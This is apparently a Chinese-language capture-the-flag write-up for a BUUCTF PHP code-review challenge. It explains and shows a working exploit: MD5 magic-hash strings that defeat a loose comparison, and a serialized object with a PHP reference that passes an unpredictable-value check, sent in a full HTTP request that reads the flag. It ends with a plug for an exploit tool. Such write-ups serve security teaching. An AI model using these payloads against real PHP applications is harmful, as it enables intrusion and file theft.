BUUCTF 基础CODE REVIEW

1、说明:

题目来自于BUUCTF 的基础部分,内容就如题,是一个代码审计。代码如下:

<?php
/**
 * Created by PhpStorm.
 * User: jinzhao
 * Date: 2019/10/6
 * Time: 8:04 PM
 */

highlight_file(__FILE__);

class BUU {
   public $correct = "";
   public $input = "";

   public function __destruct() {
       try {
           $this->correct = base64_encode(uniqid());
           if($this->correct === $this->input) {
               echo file_get_contents("/flag");
           }
       } catch (Exception $e) {
       }
   }
}

if($_GET['pleaseget'] === '1') {
    if($_POST['pleasepost'] === '2') {
        if(md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']) {
            unserialize($_POST['obj']);
        }
    }
}

2、代码内容分析

代码主要可以分为4部分,如下图
BUUCTF 基础CODE REVIEW

0部分为一个class,而且在第三部分看见了反序列化unserialize($_POST['obj']); 内容,那么就十之八九是反序列化。但是先不用去处理。且在class中可以获得flag的值。

1部分为一个IF 满足进入的条件为get 传参的值为1

2部分也是一个IF 满足条件为post 传参的值为2

3部分也是一个IF 满足条件为 需要两个不同的数。且这两个不同的数值的md5 的却相同 。

如果 123 条件都满足之后就会执行反序列化,通过POST 传参obj 执行,然后进入区域0

0区域也有一个IF 满足条件为属性correct与属性input相等。 但是correct 却是利用一个时间进行计算的值的base64 值。

3、以上每个条件的满足方式

第一部分

只需要在url 中传参即可,如下图
BUUCTF 基础CODE REVIEW

第二部分

使用burpsuit截断内容,改变传输方式为POST。如下
BUUCTF 基础CODE REVIEW

改变为POST 之后, URL 中传值的1 也会自动下来, 需要手动调整上去。

第三部分

第三部分为md5值得比较。通常可以用数组 做比较绕过和弱类型 比较绕过。
这里使用弱类型比较绕过。
原理:PHP 当中使用== 来进行比较的时候,系统会自动处理数据类型, 进行分析是数字比较还是字符比较。 而当一个字符串值是e0开通的时候,那么就会被当中数值。而e0xxxxxx都为0.
那么就只需要找到两个不同的数值,开头却是以e0开头的即可。也是蛮多的,如下图中所示。
BUUCTF 基础CODE REVIEW

然后传参md51md52 即可。 这样就可以达到md51md52 不相同。 但是他们的md5值却在php中相等。
传参方式和post一样, 使用& 符号链接。 内容如下图:
BUUCTF 基础CODE REVIEW

反序列化与引用处理。

反序列化的处理方式很简单。 值需要将原class 中的方法去掉,放进php在线运行 中去,序列化一下即可获得可以运行的序列化内容。
如图:
BUUCTF 基础CODE REVIEW

但是以上序列化之后的字符串通过post['obj'] 只能达到解析的目的。 解析后内容可以控制。却因为uniqid()函数产生的数是随时变化的,无法预测,所以input 传值多少无法确定。

这里就是本题的重要考点引用 的反序列化。 我们可以简单的把引用简单的理解为C 语言中的地址指针。
看如下代码

$a=&$b;
$a=1;//此时 输出$b 那么变量b就为1
$a=123;//此时输出$b 那么变量b就为123

由以上代码可以发现,当变量b为a的引用的时候,b的值随a变化。

道理我都懂了, 那么只需要$this->input$this->correct 的引用即可。

$this->input=&$this->correct

构造方式如下图:
BUUCTF 基础CODE REVIEW

只需要在序列化的时候设置一下即可。

完整poc如下图
BUUCTF 基础CODE REVIEW

http报文如下

POST /?pleaseget=1 HTTP/1.1
Host: a27be653-d322-4e8f-96a8-07b27c77f559.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 103
Content-Type: application/x-www-form-urlencoded

pleasepost=2&md51=s1885207154a&md52=s155964671a&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}

私货

limanmanExp 5.2版本发布了。 增加了数据库审计插件。 想要的小伙伴可以看B站。

https://www.bilibili.com/video/BV1UK4y1U7G6
下载地址在简介中。 还附带了一些简单的exp插件。 如果有兴趣自定义开发插件,也可以在看云手册中查看开发方法
地址https://www.kancloud.cn/qq496672097/limanmanexp/2139143

上一篇:server-pc--------------->lspci,lsusb,meminfo等配置信息


下一篇:cocos2d-x3.2 下使用多线程